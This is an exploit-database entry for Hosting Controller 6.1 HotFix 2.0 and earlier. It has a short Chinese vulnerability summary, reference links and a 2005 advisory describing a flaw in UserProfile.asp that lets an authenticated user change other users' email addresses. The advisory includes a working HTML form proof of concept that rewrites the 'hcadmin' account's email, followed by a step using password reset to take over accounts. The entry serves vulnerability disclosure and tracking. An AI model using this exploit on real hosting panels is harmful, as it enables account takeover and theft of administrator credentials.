https://www.exploit-db.com/exploits/1015
https://www.securityfocus.com/bid/89930
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1217

HostingController6.1HotFix2.0及更早版本允许远程攻击者通过修改UserProfile.asp的updateprofile操作中的emailaddress参数来偷窃密码并获取权限。

<!--

Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).

Title: Hosting controller program have a security bug
in "UserProfile.asp" that an authenticated user can
change other's profiles.
Why is it dangerous: a user can change other's email
address and then use forgot password to recieve their
password! also he/she can gain administrator password
by this way!
Version: 6.1 HotFix 2.0 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to
manage a host.

Exploit code to proof:
--------------------------------
Change users profiles: --> 



<form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post">
Username : <input name="UserList" value="hcadmin" type="text" size="50">
<br>
emailaddress : <input name="emailaddress" value="[email protected]" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat" type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>

<!--
-----------------------------------
Now u can use forgot password to gain passwords! -->

# milw0rm.com [2005-05-27]

Hosting Controller Hosting Controller 6.1.0 Hotfix 3.2 6.1 Hotfix 2.0

来源:SECTRACK
名称:1014062
链接:http://securitytracker.com/id?1014062